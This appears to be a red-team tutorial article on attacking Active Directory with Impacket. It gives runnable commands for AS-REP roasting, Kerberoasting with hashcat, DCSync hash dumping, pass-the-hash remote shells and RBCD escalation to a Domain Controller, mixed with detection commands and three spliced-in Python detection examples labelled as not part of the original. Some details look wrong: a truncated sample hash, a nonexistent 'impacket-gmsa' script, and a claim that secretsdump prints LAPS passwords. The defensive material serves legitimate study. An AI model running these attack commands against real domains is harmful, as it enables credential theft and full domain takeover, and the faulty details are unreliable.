
Introduction:
Active Directory (AD) remains the crown jewel of enterprise identity management, but its complexity often creates hidden attack paths that malicious actors exploit. Impacket, a powerful Python-based toolkit, provides security professionals with the ability to simulate real-world AD attacks—from enumeration to full domain compromise—without deploying invasive agents. This article dissects how red teams leverage Impacket for Kerberos attacks, credential dumping, and lateral movement, offering step‑by‑step guidance for both offensive testing and defensive hardening.
Learning Objectives:
- Enumerate AD users, SIDs, computers, and domain groups using Impacket’s `lookupsid` and `GetADUsers`
- Execute Kerberos attacks, including AS-REP Roasting and Kerberoasting, to extract crackable ticket hashes
- Perform credential dumping via DCSync, remote command execution with psexec/wmiexec, and abuse of resource‑based constrained delegation (RBCD) for privilege escalation
You Should Know:
1. Active Directory Enumeration with Impacket – Uncovering Hidden Assets
Impacket’s `lookupsid` and `GetADUsers` scripts are the first step in any AD penetration test. They reveal domain users, security identifiers (SIDs), computer objects, and group memberships without generating noisy login events. To use them, you need valid domain credentials (even low‑privileged ones) and network access to a Domain Controller.
Step‑by‑step guide (Linux – Kali Linux recommended):
1. Install Impacket via pip or from GitHub:
sudo apt install impacket-scripts (Debian/Ubuntu) or pip3 install impacket
2. Enumerate domain users using `GetADUsers`:
impacket-GetADUsers -dc-ip 192.168.1.10 DOMAIN/username:password
Replace `192.168.1.10` with your Domain Controller IP and provide valid credentials.
3. Perform SID brute‑forcing with `lookupsid`:
impacket-lookupsid DOMAIN/username:password@192.168.1.10
This iterates through RIDs (Relative Identifiers) to list all domain principals.
4. Enumerate computers in the domain:
impacket-netview DOMAIN/username:password -dc-ip 192.168.1.10
Windows alternative: Use PowerView from PowerSploit for similar enumeration, but Impacket’s cross‑platform nature makes it ideal for Linux‑based red team infrastructure.
2. Kerberos Attacks – AS-REP Roasting and Kerberoasting
Kerberos misconfigurations are a goldmine. AS-REP Roasting targets users with “Do not require Kerberos preauthentication” enabled: the DC hands out an AS-REP whose encrypted part is derived from the user’s password hash. Kerberoasting requests service tickets (TGS) for accounts that have SPNs; those tickets are encrypted with the service account’s NTLM hash when RC4 is used. Both can be cracked offline.
Step‑by‑step guide for AS-REP Roasting:
1. Use `impacket-GetNPUsers` to request AS-REPs for vulnerable users:
impacket-GetNPUsers -dc-ip 192.168.1.10 -request DOMAIN/ -usersfile userlist.txt
If no -usersfile is given, it queries all domain users (requires an authenticated context).
2. Save the output hash (starting with $krb5asrep$) to a file, e.g., asrep_hashes.txt.
3. Crack with Hashcat (mode 18200):
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
Step‑by‑step for Kerberoasting:
1. Enumerate SPNs (Service Principal Names) and request TGS tickets:
impacket-GetUserSPNs -dc-ip 192.168.1.10 -request DOMAIN/username:password
2. Output hashes (format $krb5tgs$) are crackable with Hashcat mode 13100:
hashcat -m 13100 kerberoast_hashes.txt rockyou.txt
Defensive command (Windows – detection): Monitor Event ID 4769 (Kerberos TGS request) for suspicious ticket options or unusual encryption types; Kerberoasting typically forces RC4-HMAC, which the event logs as Ticket Encryption Type 0x17. Use PowerShell:
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4769} | Where-Object {$_.Message -match 'Ticket Encryption Type:\s+0x17'}
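The two detections this section describes, written out as an added example that is not part of the original article: Python logic run over constructed 4768/4769 records (field names follow the Security log XML; the sample events, the 3-SPN sweep threshold and the `CORP.LOCAL` names are assumptions):

```python
from collections import defaultdict

RC4_HMAC = "0x17"  # etype 23; AES-encrypted tickets show 0x11 / 0x12

def asrep_roast_hits(events):
    """4768 (TGT requested) with Pre-Authentication Type 0: the AS-REQ carried no
    pre-auth, i.e. the account has 'Do not require Kerberos preauthentication' set
    and someone has just retrieved its AS-REP. Returns (user, client_ip) pairs."""
    return [(e["TargetUserName"], e["IpAddress"])
            for e in events if e["EventID"] == 4768 and e["PreAuthType"] == "0"]

def kerberoast_hits(events, spn_threshold=3):
    """4769 (service ticket requested): flag RC4 tickets for non-machine service
    accounts, and flag one client pulling tickets for many distinct services
    (a Kerberoast sweep) regardless of encryption type."""
    hits, per_client = [], defaultdict(set)
    for e in events:
        if e["EventID"] != 4769:
            continue
        svc = e["ServiceName"]
        # Machine accounts (trailing $) and krbtgt are routine traffic, not roast targets.
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        client = (e["TargetUserName"], e["IpAddress"])
        per_client[client].add(svc)
        if e["TicketEncryptionType"].lower() == RC4_HMAC:
            hits.append(("rc4_tgs", client[0], svc))
    for (user, ip), spns in per_client.items():
        if len(spns) >= spn_threshold:
            hits.append(("spn_sweep", user, "%d SPNs from %s" % (len(spns), ip)))
    return hits

# Constructed sample events (not real telemetry); a SIEM export would supply these.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc_backup", "IpAddress": "::ffff:10.0.0.50", "PreAuthType": "0"},
    {"EventID": 4768, "TargetUserName": "jdoe", "IpAddress": "::ffff:10.0.0.21", "PreAuthType": "2"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "IpAddress": "::ffff:10.0.0.50", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "IpAddress": "::ffff:10.0.0.50", "ServiceName": "svc_web", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "IpAddress": "::ffff:10.0.0.50", "ServiceName": "svc_iis", "TicketEncryptionType": "0x12"},
    {"EventID": 4769, "TargetUserName": "asmith@CORP.LOCAL", "IpAddress": "::ffff:10.0.0.21", "ServiceName": "FS01$", "TicketEncryptionType": "0x12"},
]

if __name__ == "__main__":
    print(asrep_roast_hits(SAMPLE_EVENTS))
    print(kerberoast_hits(SAMPLE_EVENTS))
```

Service accounts without AES keys (`msDS-SupportedEncryptionTypes` unset) will legitimately produce RC4 tickets, so the sweep count is the more robust signal in such domains.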
3. Credential Dumping with DCSync – Simulating Domain Admin Persistence
DCSync abuses the Directory Replication Service Remote Protocol to pull password hashes directly from a Domain Controller. This attack works if an account has `Replicating Directory Changes` rights (often granted to Domain Admins or certain delegated accounts).
Step‑by‑step guide:
1. Identify a user with DCSync privileges (e.g., a Domain Admin or a compromised account in the “Domain Admins” group).
2. Use `impacket-secretsdump` to replicate the NTDS.dit database:
impacket-secretsdump -dc-ip 192.168.1.10 DOMAIN/admin_user:password@192.168.1.10
3. The output includes NTLM hashes of all domain users, Kerberos keys, and sometimes cleartext passwords. Save the hashes for pass‑the‑hash attacks.
4. Use a retrieved NTLM hash to authenticate as any user via `psexec` or `wmiexec` (the `-hashes` value is LMHASH:NTHASH):
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb11ad245b12e6e4f56c DOMAIN/username@192.168.1.10
Mitigation: Enforce strong delegation policies, monitor Event ID 4662 (Directory Service Access) for `DS-Replication-Get-Changes` rights, and use Protected Users group or Credential Guard.
4. Remote Command Execution – Lateral Movement via PsExec and WMIExec
Impacket provides agent‑less remote execution tools that mimic legitimate admin tools. `psexec` creates a service on the target, while `wmiexec` uses WMI—both are stealthier than traditional RDP.
Step‑by‑step guide using psexec:
1. With compromised credentials or a hash, execute:
impacket-psexec DOMAIN/username:password@target_IP
Or with pass‑the‑hash:
impacket-psexec -hashes :NTLM_hash DOMAIN/username@target_IP
2. You’ll receive an interactive `cmd.exe` session on the target.
Using wmiexec (less noisy):
impacket-wmiexec DOMAIN/username:password@target_IP
This uses WMI to spawn a semi‑interactive shell. For single commands:
impacket-wmiexec DOMAIN/username:password@target_IP 'whoami /all'
Windows detection: Monitor service creation events (Event ID 7045 for PsExec‑like service names) and WMI activity (Event ID 4688 with `wmic.exe` or winrm). Use Sysmon or EDR rules.
5. Privilege Escalation via Resource-Based Constrained Delegation (RBCD)
RBCD lets a resource (the target computer) declare which accounts may impersonate users to its services. Attackers who control a machine account (e.g., one they added themselves) can escalate to Domain Admin by writing that account into the target’s `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute and then impersonating a privileged user.
Step‑by‑step guide (advanced – requires `impacket-addcomputer` and `rbcd.py`):
1. Add a new computer object to the domain (if you have domain credentials):
impacket-addcomputer -dc-ip 192.168.1.10 -computer-name FAKEPC$ -computer-pass Passw0rd123 DOMAIN/username:password
2. Use `rbcd.py` to set RBCD delegation on a high‑value target (e.g., a Domain Controller):
impacket-rbcd -dc-ip 192.168.1.10 -action write -delegate-from FAKEPC$ -delegate-to DC01$ DOMAIN/username:password
3. Request a TGS for a privileged user (e.g., Administrator) to the target using `getST.py`, authenticating as the new computer account (use `-hashes` only as an alternative to its password, not alongside it):
impacket-getST -dc-ip 192.168.1.10 -spn cifs/DC01.DOMAIN.local -impersonate Administrator DOMAIN/FAKEPC$:Passw0rd123
4. Use the resulting ticket with `psexec` or `wmiexec` to gain full access.
Mitigation: Restrict `ms-DS-MachineAccountQuota` (default 10, which lets ordinary users create computer accounts) and monitor for unusual delegation changes, i.e. writes to `msDS-AllowedToActOnBehalfOfOtherIdentity`.
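An audit routine for the mitigation above, added here as an example and not part of the original article or of Impacket: it parses the self-relative security descriptor stored in `msDS-AllowedToActOnBehalfOfOtherIdentity` and lists the trustee SIDs, so unexpected delegations to a DC stand out. The domain SID, RIDs, computer names and the full-control access mask on the ACEs are assumptions used to construct test data.

```python
import struct

FULL_CONTROL = 0x000F01FF  # assumed access mask on each trustee ACE in the delegation SD

def sid_to_str(buf, off):
    """Decode a binary SID at offset `off` into S-1-5-21-... form."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs))

def rbcd_trustees(sd):
    """List the SIDs granted by ACCESS_ALLOWED ACEs in the DACL of a self-relative
    security descriptor, i.e. the accounts allowed to act on behalf of other
    identities to this computer. An empty/absent attribute means no RBCD trustees."""
    if not sd:
        return []
    _rev, _sbz1, _control, _owner, _group, _sacl, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if off_dacl == 0:
        return []
    _acl_rev, _sbz, _acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos, trustees = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == 0x00:  # ACCESS_ALLOWED_ACE_TYPE; the SID follows the 4-byte mask
            trustees.append(sid_to_str(sd, pos + 8))
        pos += ace_size
    return trustees

# --- Constructed test data: build a descriptor shaped like a delegation write ---
def build_sid(rid, domain=(21, 1111, 2222, 3333)):
    subs = list(domain) + [rid]
    return bytes([1, len(subs)]) + (5).to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def build_sd(sids):
    aces = b"".join(struct.pack("<BBHI", 0x00, 0, 8 + len(s), FULL_CONTROL) + s for s in sids)
    dacl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(sids), 0) + aces
    # Header: revision 1, control SE_DACL_PRESENT|SE_SELF_RELATIVE, DACL right after the 20-byte header
    return struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20) + dacl

def audit(computers, approved):
    """Flag (computer, trustee) pairs whose trustee is not in the approved set."""
    return [(pc, t) for pc, sd in computers.items() for t in rbcd_trustees(sd) if t not in approved]

if __name__ == "__main__":
    sample = {"DC01$": build_sd([build_sid(1105)]), "FS01$": build_sd([build_sid(1200), build_sid(1105)]), "WS07$": b""}
    print(audit(sample, approved={"S-1-5-21-1111-2222-3333-1200"}))
```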
6. Extracting LAPS and GMSA Passwords
Local Administrator Password Solution (LAPS) stores local admin passwords in AD, often readable by privileged users. Group Managed Service Accounts (GMSA) also store readable blobs. Impacket’s `secretsdump` can retrieve these when run with sufficient rights.
Step‑by‑step guide:
1. Run `secretsdump` as a user with read access to the LAPS attribute (ms-Mcs-AdmPwd):
impacket-secretsdump -dc-ip 192.168.1.10 DOMAIN/admin_user:password@192.168.1.10 -just-dc-ntlm
LAPS passwords appear in the output as ms-Mcs-AdmPwd: password.
2. For GMSA, use `impacket-gmsa` to retrieve the managed password blob:
impacket-gmsa -dc-ip 192.168.1.10 -gmsa-name GMSA_ACCOUNT$ DOMAIN/username:password
Defensive actions: Restrict LAPS read permissions to only authorized admins and rotate passwords frequently. Monitor for queries to `ms-Mcs-AdmPwd` using AD audit logs.
7. Defensive Hardening and Detection – What Blue Teams Must Know
To counter Impacket‑based attacks, implement layered defenses:
- Network segmentation: Block SMB/RPC (ports 445, 135, 49152-65535) between untrusted zones.
- Deploy EDR with behavioural rules for `psexec` service creation and `secretsdump`’s DRSUAPI calls.
- Enable advanced logging: PowerShell logging, Sysmon Event ID 1 (process creation), and auditing of directory service changes.
- Use JEA (Just Enough Administration) and remove unnecessary delegation rights.
- Apply Microsoft’s “Securing Privileged Access” recommendations, including Tier 0 isolation.
Linux detection command (using Zeek/Bro on network traffic): replay the capture, then search the resulting dce_rpc.log for DRSUAPI replication calls (with -r, Zeek writes its logs to the current directory):
zeek -r capture.pcap -C
grep -iE "drsuapi|DRSGetNCChanges" dce_rpc.log
Windows command to detect Impacket DCSync attempts (requires PowerShell and Get-WinEvent); 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 is the control-access GUID that Event ID 4662 logs for DS-Replication-Get-Changes:
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4662} | Where-Object {$_.Message -match '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'} | Format-List
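The 4662-based DCSync detection that the mitigation in section 3 and the command above both describe, as an added example that is not part of the original article: Python logic over constructed 4662 records that matches the replication control-access GUIDs and suppresses the accounts that replicate legitimately (the sample records, `CORP.LOCAL` names and DC allowlist are assumptions):

```python
# Control-access right GUIDs that a DCSync needs (fixed, well-known AD schema values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = "0x100"  # 4662 AccessMask for an extended/control-access right

def dcsync_alerts(events, replicators):
    """Return (subject, rights, object) for 4662 events that exercise a replication
    right from any account not in `replicators`. Domain Controller machine accounts
    (and e.g. an Azure AD Connect MSOL_* account) replicate legitimately and belong
    in that allowlist; anything else asking for Get-Changes-All is a DCSync candidate."""
    alerts = []
    for e in events:
        if e.get("EventID") != 4662 or e.get("AccessMask") != CONTROL_ACCESS:
            continue
        subject = e["SubjectUserName"].upper()
        if subject in replicators:
            continue
        props = e["Properties"].lower()
        rights = sorted(name for guid, name in REPLICATION_RIGHTS.items() if guid in props)
        if rights:
            alerts.append((e["SubjectUserName"], tuple(rights), e["ObjectName"]))
    return alerts

DOMAIN_OBJECT = "DC=corp,DC=local"
# Constructed sample 4662 records (Properties as logged: control-access GUID(s) plus the object class GUID).
SAMPLE_4662 = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "AccessMask": "0x100", "ObjectName": DOMAIN_OBJECT,
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x100", "ObjectName": DOMAIN_OBJECT,
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x10", "ObjectName": "CN=jdoe,CN=Users,DC=corp,DC=local",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},  # ordinary property read, not replication
]

if __name__ == "__main__":
    for alert in dcsync_alerts(SAMPLE_4662, replicators={"DC01$", "DC02$"}):
        print(alert)
```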
What Undercode Say:
- Impacket remains the Swiss army knife for AD penetration testing, enabling stealthy, agent‑less attacks that mimic legitimate administrative activity. Every red team must master its enumeration, Kerberos, and DCSync modules.
- Defenders cannot rely on traditional antivirus or simple log monitoring—Impacket’s use of native Windows protocols (SMB, WMI, RPC) makes it blend in. Successful blue teams must deploy behavioural analytics, restrict DCSync rights, and aggressively patch Kerberos misconfigurations.
Prediction:
As hybrid and cloud‑joined AD environments expand, Impacket’s evolution will include more Azure AD and Entra ID attack primitives. However, Microsoft’s increasing adoption of Kerberos armoring (FAST) and default hardening of preauthentication will force attackers to shift toward RBCD and golden ticket variants. Organisations that fail to implement tiered administration and continuous AD attack path monitoring will likely face compromise within months, as automated Impacket‑driven tools become standard in ransomware playbooks. The arms race between red teams using Impacket and blue teams leveraging identity threat detection (ITDR) platforms is only beginning.
Reported By: Yashika Dhir – Hackers Feeds